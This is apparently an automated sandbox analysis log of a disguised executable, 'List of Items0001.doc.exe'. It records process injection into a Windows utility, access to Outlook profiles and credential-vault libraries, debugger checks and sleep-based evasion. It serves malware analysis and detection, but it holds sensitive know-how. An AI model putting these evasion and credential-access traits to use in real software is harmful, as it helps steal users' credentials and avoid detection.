        Source: List of Items0001.doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: List of Items0001.doc.exeVirustotal: Detection: 9%
        Source: List of Items0001.doc.exeReversingLabs: Detection: 13%
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile read: C:\Users\user\Desktop\List of Items0001.doc.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess created: C:\Users\user\Desktop\List of Items0001.doc.exe "C:\Users\user\Desktop\List of Items0001.doc.exe"Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wdscore.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: List of Items0001.doc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: TapiUnattend.pdbGCTL source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MzAJhEkohQv.exe, 00000004.00000000.674131095770.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678885977938.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: List of Items0001.doc.exe, List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: TapiUnattend.pdb source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000003.00000002.674206863103.0000000001768000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.674050583045.0000000004F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6DB61BFF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB630C0 push eax; ret 0_2_6DB630EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326321AD pushad ; retf 0004h3_2_3263223F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326397A1 push es; iretd 3_2_326397A8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326608CD push ecx; mov dword ptr [esp], ecx3_2_326608D6
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393D3A2 push ebx; retf 4_2_0393D3A3
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_03940A04 push FFFFFFA4h; retf 4_2_03940A07
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0394D22F push 0000002Bh; iretd 4_2_0394D38A
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039398A4 push cs; ret 4_2_039398A6
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039396F2 push edx; retf 4_2_039396F7
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393F673 push esp; iretd 4_2_0393F674
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_039425C2 push esp; retf 4_2_0394262B
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exeCode function: 4_2_0393F5EF push edi; ret 4_2_0393F5F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        Source: Possible double extension: doc.exeStatic PE information: List of Items0001.doc.exe
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI/Special instruction interceptor: Address: 5715348
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI/Special instruction interceptor: Address: 1F05348
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD144
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD604
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD764
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD324
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD364
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD004
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAFF74
        Source: C:\Windows\SysWOW64\TapiUnattend.exeAPI/Special instruction interceptor: Address: 7FF90DBAD864
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 rdtsc 3_2_326A1763
        Source: C:\Windows\SysWOW64\TapiUnattend.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 5340Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 49 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -245000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 57 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -85500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep count: 71 > 30Jump to behavior
        Source: C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe TID: 1916Thread sleep time: -71000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: explorer.exe, 00000009.00000002.678908041013.000000000C2AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C2AB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
        Source: List of Items0001.doc.exe, 00000003.00000003.674115003172.0000000002334000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674115450452.0000000002334000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.677560796859.000000000C8A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.678908041013.000000000C8A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: MzAJhEkohQv.exe, 00000006.00000002.678883194539.000000000044F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
        Source: List of Items0001.doc.exe, 00000003.00000002.674209694969.00000000022D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: TapiUnattend.exe, 00000005.00000002.677674890216.0000000003294000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.674508200436.000001F76DC6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI call chain: ExitProcess graph end nodegraph_0-4285
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeAPI call chain: ExitProcess graph end nodegraph_0-4505
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1763 rdtsc 3_2_326A1763
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A34E0 NtCreateMutant,LdrInitializeThunk,3_2_326A34E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_6DB61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6DB61BFF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271D270 mov eax, dword ptr fs:[00000030h]3_2_3271D270
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326591F0 mov eax, dword ptr fs:[00000030h]3_2_326591F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326591F0 mov eax, dword ptr fs:[00000030h]3_2_326591F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F1F0 mov eax, dword ptr fs:[00000030h]3_2_3268F1F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F1F0 mov eax, dword ptr fs:[00000030h]3_2_3268F1F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327281EE mov eax, dword ptr fs:[00000030h]3_2_327281EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327281EE mov eax, dword ptr fs:[00000030h]3_2_327281EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701C0 mov eax, dword ptr fs:[00000030h]3_2_326701C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701C0 mov eax, dword ptr fs:[00000030h]3_2_326701C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326751C0 mov eax, dword ptr fs:[00000030h]3_2_326751C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327351B6 mov eax, dword ptr fs:[00000030h]3_2_327351B6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E1A4 mov eax, dword ptr fs:[00000030h]3_2_3269E1A4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E1A4 mov eax, dword ptr fs:[00000030h]3_2_3269E1A4
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov ecx, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov eax, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326941BB mov eax, dword ptr fs:[00000030h]3_2_326941BB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326931BE mov eax, dword ptr fs:[00000030h]3_2_326931BE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326931BE mov eax, dword ptr fs:[00000030h]3_2_326931BE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32664180 mov eax, dword ptr fs:[00000030h]3_2_32664180
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1190 mov eax, dword ptr fs:[00000030h]3_2_326A1190
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A1190 mov eax, dword ptr fs:[00000030h]3_2_326A1190
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32689194 mov eax, dword ptr fs:[00000030h]3_2_32689194
